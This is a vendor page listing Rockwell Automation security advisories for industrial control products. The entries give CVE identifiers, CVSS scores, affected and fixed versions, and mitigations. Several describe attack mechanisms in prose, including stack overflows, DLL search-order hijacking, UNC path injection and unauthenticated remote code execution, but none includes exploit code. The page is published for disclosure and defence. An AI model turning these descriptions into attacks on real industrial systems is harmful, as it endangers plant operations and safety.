The CODESYS Control runtime system is utilized in the affected ASEM™ (A Rockwell Automation Company) products and enables embedded or PC-based devices to be programmable industrial controllers. Such products contain communication servers for the CODESYS protocol to enable communication with clients like the CODESYS Development System.

These products have the following vulnerabilities:

 

CVE-2022-47378 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE-1288: Improper Validation of Consistency within Input

 

After successful authentication, specifically crafted communication requests with inconsistent content can cause the CmpFiletransfer component to read internally from an invalid address, potentially leading to a denial-of-service condition.

 

CVE-2022-47379 IMPACT

CVSS Base Score: 8.8/10 (High)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-787: Out-of-bounds Write

After successful authentication, specifically crafted communication requests can cause the CmpApp component to write threat actor-controlled data to memory, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47380, CVE-2022-47381 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

After successful authentication, specifically crafted communication requests can cause the CmpApp component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

 

CVE-2022-47382, CVE-2022-47383, CVE-2022-47384, CVE-2022-47386, CVE-2022-47387, CVE-2022-47388, CVE-2022-47389, CVE-2022-47390 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

After successful authentication, specifically crafted communication requests can cause the CmpTraceMgr

component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47385 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

After successful authentication, specifically crafted communication requests can cause the CmpAppForce

component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47392 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CWE-1288: Improper Validation of Consistency within Input

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

 

After successful authentication, specifically crafted communication requests with inconsistent content can cause the CmpApp/CmpAppBP/CmpAppForce components to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2022-47393 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CWE-822: Untrusted Pointer Dereference

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

After successful authentication, specifically crafted communication requests can cause the cmpFiletransfer component to dereference addresses provided by the request for internal read access, which can lead to a denial-of-service situation.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to CODESYS version 3.5.19.2 which has been released to mitigate these issues.
  • Additionally, we encourage the customer to implement our suggested security best practices to minimize risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

CODESYS Advisory

High
SD1658 | SD1658 | SIS Workstation and ISaGRAF Workbench Code Execution and Privilege Escalation
Published Date:
November 15, 2023
Last Updated:
November 15, 2023
CVE IDs:
CVE-2015-9268
Products:
Safety Instrumented System Workstation, ISaGRAF® Workbench
CVSS Scores:
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: November 14, 2023

Last updated: November 14, 2023

Revision Number: 1.0

CVSS Score: 7.8/10

The security of our products is important to us as your chosen industrial automation supplier.  This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

Safety Instrumented System Workstation

<= v1.2

              v2.00 and later

ISaGRAF® Workbench

<= v6.6.9

              v6.06.10 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2015-9268 IMPACT

Due to the third-party vulnerabilities in Nullsoft Scriptable Install System (NSIS), the SIS Workstation and ISaGRAF® Workbench installer and uninstaller have unsafe implicit linking against Version.dll. Therefore, there is no protection mechanism in the wrapper function that resolves the dependency at an appropriate time during runtime. Also, the SIS workstation and ISaGRAF® Workbench uninstaller uses temporary folder locations that allow unprivileged local users to overwrite files. This allows a local attack in which the uninstaller can be replaced by a malicious program.

CVSS Base Score: 7.8/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: Improper Input Validation

Known Exploited Vulnerability (KEV) database: 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

 ADDITIONAL RESOURCES

Critical
SD1657 | FactoryTalk® Activation Contains Wibu CodeMeter Vulnerabilities
Published Date:
November 15, 2023
Last Updated:
November 19, 2024
CVE IDs:
CVE-2023-38545, CVE-2023-3935
Products:
FactoryTalk Activation Manager
CVSS Scores (v3.1):
7.9, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: November 14, 2023

Last updated: November 14, 2023

Revision Number: 1.0

CVSS Score: 7.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product (automated)

First Known in Software Version

Corrected in Software Version

FactoryTalk Activation Manager

V4.00 (Utilizes Wibu-Systems CodeMeter <7.60c)

5.01

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-38545 IMPACT

Rockwell Automation FactoryTalk Activation Manager and Studio 5000 Logix Designer uses the affected Wibu-Systems’ products which internally use the libcurl in a version that is vulnerable to a buffer overflow attack if curl is configured to redirect traffic through a SOCKS5 proxy. A malicious proxy can exploit a bug in the implemented handshake to cause a buffer overflow. If no SOCKS5 proxy has been configured, there is no attack surface.

CVSS Base Score: 7.9

CVSS Vector: CVSS:3.1/ AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

CVE-2023-3935 IMPACT

Rockwell Automation FactoryTalk Activation Manager and Studio 5000 Logix Designer uses the affected Wibu-Systems’ products which contain a heap buffer overflow vulnerability in Wibu CodeMeter Runtime network service up to version 7.60b that allows an unauthenticated, remote attacker to achieve RCE and gain full access of the host system.

CVSS Base Score: 9.8

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to FactoryTalk Activation Manager 5.01 which has been patched to mitigate these issues (Available versions here, search "activation")
  • For information on how to mitigate Security Risks on industrial automation control systems Additionally, we encourage the customer to implement our suggested security best practices to minimize risk of the vulnerability.

ADDITIONAL RESOURCES

High
PN1656 | FactoryTalk® View Site Edition Vulnerable to Improper Input Validation
Published Date:
October 31, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-46289
Products:
FactoryTalk® View Site Edition
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision Number

1.0

Revision History

Version 1.0 – October 26, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
FactoryTalk® View Site Edition V11.0 v11.0 & v12.0 & v13.0 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-46289 IMPACT
The affected product insufficiently validates user input, which could potentially allow threat actors to send malicious data bringing the product offline. If exploited, the product would become unavailable and require a restart to recover resulting in a denial-of-service condition.

CVSS Base Score: 7.5/10 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Additional Resources

High
PN1655 | FactoryTalk® Services Platform Elevated Privileges Vulnerability
Published Date:
October 31, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-46290
Products:
FactoryTalk® Services Platform
CVSS Scores (v3.1):
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision Number

1.0

Revision History

Version 1.0 – October 26, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
FactoryTalk® Services Platform v2.74 V2.80 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-46290 IMPACT
Due to inadequate code logic, a previously unauthenticated threat actor could potentially obtain a local Windows OS user token through the FactoryTalk® Services Platform web service and then use the token to log in into FactoryTalk® Services Platform . This vulnerability can only be exploited if the authorized user did not previously log in into the FactoryTalk® Services Platform web service.

CVSS Base Score: 8.1/10 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Additional Resources

High
PN1654 | Arena® Simulation Buffer Overflow Vulnerabilities
Published Date:
October 31, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-27854, CVE-2023-27858
Products:
Arena® Simulation Software
CVSS Scores (v3.1):
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision Number

1.0

Revision History

Version 1.0 – October 27, 2023

Affected Products

Affected Product (automated) First Known in Software Version Corrected in Software Version
Arena® Simulation Software V16.00 16.20.02

Vulnerability Details

These vulnerabilities were reported to Rockwell Automation by Michael Heinzl.  Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-27854 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could potentially allow a malicious user to commit unauthorized arbitrary code to the software by using a memory buffer overflow.  The threat-actor could then execute malicious code on the system affecting the confidentiality, integrity, and availability of the product.  The user would need to open a malicious file provided to them by the attacker for the code to execute.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-125 Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

CVE-2023-27858 IMPACT
An arbitrary code execution vulnerability could potentially allow a malicious user to commit unauthorized code to the software by using a uninitialized pointer in the application.  The threat-actor could then execute malicious code on the system affecting the confidentiality, integrity, and availability of the product.  The user would need to open a malicious file provided to them by the attacker for the code to execute.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-824: Access of Uninitialized Pointer

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

Additional Resources

Critical
PN1653 | Stratix® 5800 and 5200 vulnerable to Cisco IOS XE Web UI Privilege Escalation (Active Exploit)
Published Date:
October 18, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-20198
Products:
Stratix® 5200, Stratix® 5800
CVSS Scores (v3.1):
7.2, 10
Known Exploited Vulnerability (KEV):
Yes
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 10/17/2023
Last updated:  02/14/2024
Revision Number: 2.0
Revision History: Updated Corrected in firmware revision
CVSS Score: 10/10

Rockwell Automation is aware of an actively exploited zero-day vulnerability affecting the Stratix® 5800 and the newly released Stratix® 5200 product. This vulnerability was reported by Cisco on October 16, 2023 and additional information can be found in their original disclosure. As of the time of publication, no patch is available for this vulnerability and multiple cases of active exploitation have been observed.  While Rockwell Automation has no evidence of active exploitation against the Stratix® product line, this vulnerability was discovered by Cisco Talos during an incident response for a Cisco customer.  This advisory will be updated, as remediation steps become available.

REVISION 1.1 UPDATE

Since publication of the original disclosure, the exploit code has become publicly available. Availability of exploit code reduces the technical barriers for threat actors to target the affected devices.  Rockwell Automation has no evidence of active exploitation against the Stratix® product line currently.  This advisory has been updated to include specific steps to take to create access control measures utilizing the Web UI.  Rockwell Automation strongly encourages customers to follow the mitigation guidelines.

REVISION 2.0 UPDATE

Rockwell Automation has released a software update that remediates the vulnerabilities in the affected products. We strongly recommend customers update to the corrected firmware revision as soon as possible.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First known in firmware revision

Corrected in Firmware Revision

Stratix® 5200, 5800

All versions running Cisco IOS XE Software with the Web UI feature enabled

17.12.02

VULNERABILITY DETAILS

CVE-2023-20198 IMPACT

Rockwell Automation is aware of active exploitation of a previously unknown vulnerability in the Web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated threat actor to create an account on a vulnerable system with privilege level 15 access. The threat actor could then potentially use that account to gain control of the affected system.

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 10/10 (high)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Known Exploited Vulnerability (KEV) database: Yes

CVE-2023-20273 IMPACT

Rockwell Automation is aware of active exploitation of a previously unknown vulnerability in the Web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability could allow an authenticated, remote threat actor to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. A threat actor could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the threat actor to inject commands to the underlying operating system with root privileges.  

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 7.2/10 (high)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Known Exploited Vulnerability (KEV) database: Yes

Mitigations and Workarounds

Rockwell strongly encourages customers to follow guidance disabling Stratix® HTTP servers on all internet-facing systems.

  • To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature.
  • Cisco Talos has provided Indicators of Compromise and Snort rules that can be found here.

REVISION 1.1 UPDATE

  • Access Control Lists should be enabled to only allow specific IP addresses to access the Web UI of the device.  Detailed instructions on how to create the Access Control List is in QA67053.
  • When implementing access controls for these services, be sure to review the controls because there is the potential for an interruption in production services.

ADDITIONAL RESOURCES

High
PN1652 | PN1652 | FactoryTalk® Linx Vulnerable to Denial-of-Service and Information Disclosure
Published Date:
October 17, 2023
Last Updated:
October 17, 2023
CVE IDs:
CVE-2023-29464
Products:
FactoryTalk® Linx
CVSS Scores:
8.2
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision Number

1.0

Revision History

Version 1.0 – October 12, 2023

Affected Products

Affected Product First Known in Revision Corrected in Revision
FactoryTalk® Linx v6.20 v6.20 & v6.30 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  Rockwell Automation would like to thank Yuval Gordon, CPS Research, Microsoft Threat Intelligence Community for reporting this vulnerability to us.

CVE-2023-29464 IMPACT

FactoryTalk Linx, in the Rockwell Automation PanelView™ Plus, allows an unauthenticated threat actor to read data from memory via crafted malicious packets. Sending a size larger than the buffer size results in leakage of data from memory resulting in an information disclosure. If the size is large enough, it causes communications over the common industrial protocol to become unresponsive to any type of packet, resulting in a denial-of-service to FactoryTalk® Linx over the common industrial protocol.

CVSS Base Score: 8.2/10 (high)
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
CWE: 20 – Improper Input Validation

Risk Mitigation & User Action

Customers using the affected versions are encouraged to upgrade to corrected firmware revisions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Additional Resources

Critical
PN1649 | PN1649 | Select Logix Communication Modules Vulnerable to Email Object Buffer Overflow
Published Date:
October 09, 2023
Last Updated:
October 09, 2023
CVE IDs:
CVE-2023-2262
Products:
ControlLogix Communication - Ethernet/IP
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision Number

1.0

Revision History

Version 1.0 – September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.  This vulnerability is not related to PN1633 - Remote Code Execution and Denial-of-Service Vulnerabilities in Select Communication Modules .

Affected Products

Affected Catalog Series Affected Firmware Version Corrected in Firmware Version
1756-EN2T
1756-EN2TK
1756-EN2TXT		 A, B, C <=5.008 and 5.028 Update to 5.009 and 5.029 or later
D <=11.002 Update to >=11.003 or later
1756-EN2TP
1756-EN2TPK
1756-EN2TPXT		 A <=11.002 Update to >=11.003 or later
1756-EN2TR
1756-EN2TRK
1756-EN2TRXT		 A, B <=5.008 and 5.028 Update to 5.009 and 5.029 or later
C <=11.002 Update to >=11.003 or later
1756-EN2F
1756-EN2FK		 A, B <=5.008 and 5.028 Update to 5.009 and 5.029 or later
C <=11.002 Update to >=11.003 or later
1756-EN3TR
1756-EN3TRK		 A <=5.008 and 5.028 Update to 5.009 and 5.029 or later
B <=11.002 Update to >=11.003 or later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2262 IMPACT
A buffer overflow vulnerability exists in select communication devices. If exploited, a threat actor could potentially leverage this vulnerability to perform a remote code execution. To exploit this vulnerability, a threat actor would have to send a maliciously crafted CIP request to device.

CVSS Base Score: 9.8/10
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-121: Stack-based Buffer Overflow

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Additional Resources

Critical
PN1648 | PN1648 | Connected Components Workbench™ Vulnerable to CefSharp Vulnerabilities
Published Date:
October 05, 2023
Last Updated:
October 05, 2023
CVE IDs:
CVE-2020-16017, CVE-2022-0609, CVE-2020-16009, CVE-2020-16013, CVE-2020-15999
Products:
Connected Components Workbench (CCW)
CVSS Scores:
9.6, 8.8, 8.8, 8.8, 6.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision Number

1.0

Revision History

Version 1.0 – September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Affected Products

Affected Product Affected Versions Corrected in Software Version
Connected Components Workbench™ (CCW) Versions Prior to R21 R21 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2020-16017 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a use after free vulnerability in Google Chrome versions before 86.0.4240.198. If exploited, a remote threat actor could potentially perform a sandbox escape via a crafted HTML page.

CVSS Base Score: 9.6/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE: 416 – Use After Free

Known Exploited Vulnerability (KEV) database:  Yes

CVE-2022-0609 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a use after free vulnerability in Animation within Google Chrome before 98.0.4758.102. This vulnerability could potentially allow a remote threat actor to exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 416 – Use After Free

Known Exploited Vulnerability (KEV) database:  Yes

CVE-2020-16009 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains an inappropriate implementation in V8 of Google Chrome before 86.0.4240.18. This vulnerability allows a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write & 843 Access of Resource Using Incompatible Type (‘Type Confusion”)
 
Known Exploited Vulnerability (KEV) database:  Yes

CVE-2020-16013 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains an inappropriate implementation in V8 of Google Chrome before 86.0.4240.198. This vulnerability allows a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database:  Yes

CVE-2020-15999
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a heap buffer overflow vulnerability in Freetype within Google Chrome before 86.0.4240.111. This vulnerability could allow a remote threat actor to potentially exploit heap corruption via a crafted HTML.

CVSS Base Score: 6.5/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database:  Yes

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Additional Resources

Critical
PN1647 | PN1647 | PanelView™ 800 Vulnerable to CVE-2017-12652
Published Date:
October 05, 2023
Last Updated:
October 05, 2023
CVE IDs:
CVE-2017-12652
Products:
PanelView 800, PanelView Component Refresh (PanelView 800)
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision Number

1.0

Revision History

Version 1.0 - September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Affected Products

Affected Product First Known in firmware revision Corrected in firmware revision
2711R-T10T v3.011 v6.011
2711R-T7T
2711R-T4T

Vulnerability Details

An input/output validation vulnerability exists in a third-party component that the PanelView™ 800 utilizes. Libpng, which is PNG’s reference library, version 1.6.32 and earlier does not properly check the length of chunks against the user limit. Libpng versions prior to 1.6.32 are susceptible to a vulnerability which, when successfully exploited, could potentially lead to a disclosure of sensitive information, addition or modification of data, or a denial-of-service condition.
Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 9.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 – Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.
 

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Additional Resources

Medium
PN1646 | PN1646 | KEPServer Enterprise Vulnerable to Multiple Vulnerabilities
Published Date:
October 05, 2023
Last Updated:
October 05, 2023
CVE IDs:
CVE 2023-29444, CVE 2023-29445, CVE 2023-29446, CVE 2023-29447
Products:
KEPServe Enterprise
CVSS Scores:
6.3, 6.3, 4.7, 5.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision History

Version 1.0 – September 12, 2023

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
KEPServer Enterprise v11.00 Expected November 2023

Vulnerability Details

Rockwell Automation was notified by CISA of vulnerabilities discovered in Kepware® KEPServerEX (also known as PTC ThingWorx Industrial Connectivity), which affects Rockwell Automation’s KEPServer Enterprise product. Successful exploitation of these vulnerabilities could allow a threat actor to gain elevated privileges, execute arbitrary code, and obtain server hashes and credentials.

CVE 2023-29444 KEPServer Enterprise Uncontrolled Search Path Element
The installer application of KEPServerEX is vulnerable to DLL search order hijacking. This could allow an adversary to repackage the installer with a malicious DLL and trick users into installing the trojanized software. Successful exploitation could lead to code execution with administrator privileges.

CVSS Base Score: 6.3 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-427: Uncontrolled Search Path Element

CVE 2023-29445 KEPServer Enterprise Uncontrolled Search Path Element
KEPServerEX binary is vulnerable to DLL search order hijacking. A locally authenticated adversary could escalate privileges to administrator by planting a malicious DLL in a specific directory.

CVSS Base Score: 6.3 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-427: Uncontrolled Search Path Element

CVE 2023-29446 KEPServer Enterprise Improper Input Validation
KEPServerEx is vulnerable to UNC path injection via a malicious project file. By tricking a user into loading a project file and clicking a specific button in the GUI, an adversary could obtain Windows user NTLMv2 hashes, and crack them offline.

CVSS Base Score: 4.7 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-20: Improper Input Validation

CVE 2023-29447 KEPServer Enterprise Insufficiently Protected Credentials
The KEPServerEX Configuration web server uses basic authentication to protect user credentials. An adversary could perform a man-in-the-middle (MitM) attack via ARP spoofing to obtain the web server's plaintext credentials.

CVSS Base Score: 5.7 /10 (Medium)
CVSS 3.1 Vector String: AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-522: Insufficiently Protected Credentials

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected versions are encouraged to apply the risk mitigations below and implement our suggested security best practices to minimize risk of this vulnerability in their environments. 

Additional Resources

Critical
PN1645 | PN1645 | FactoryTalk View Machine Edition Vulnerable to Remote Code Execution
Published Date:
October 05, 2023
Last Updated:
October 05, 2023
CVE IDs:
CVE-2023-2071
Products:
FactoryTalk View Machine Edition
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision Number

1.0

Revision History

Version 1.0 – September 12, 2023

Affected Products

Affected Product First Known in Revision Corrected in Revision
FactoryTalk View Machine Edition v12.0 v12.0 & v13.0 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. Rockwell Automation would like to thank Yuval Gordon, CPS Research, and the Microsoft Threat Intelligence Community for reporting this vulnerability to us.

CVE-2023-2071 IMPACT

FactoryTalk View Machine Edition on the PanelView Plus, improperly verifies user’s input, which allows unauthenticated attacker to achieve remote code executed via crafted malicious packets.  The device has the functionality, through a CIP class, to execute exported functions from libraries.  There is a routine that restricts it to execute specific functions from two dynamic link library files.  By using a CIP class, an attacker can upload a self-made library to the device which allows the attacker to bypass the security check and execute any code written in the function.

CVSS Base Score: 9.8/10 (high)
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 – Improper Input Validation

Risk Mitigation & User Action

Customers using the affected versions are encouraged to upgrade to corrected firmware revisions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Additional Resources

High
PN1642 | PN1642 | Pavilion8® Security Misconfiguration Vulnerability
Published Date:
October 05, 2023
Last Updated:
October 05, 2023
CVE IDs:
CVE-2023-29463
Products:
ControlLogix Communications - Ethernet/IP
CVSS Scores:
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History

Revision Number

1.0

Revision History

Version 1.0 – September 12, 2023

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
Pavilion8® v5.17 v5.20

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-29463 IMPACT

The JMX Console within the Pavilion is exposed to application users and does not require authentication. If exploited, a malicious user could potentially retrieve other application users’ session data and or log users out of their session.

CVSS Base Score: 8.8/10
CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: 287- Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

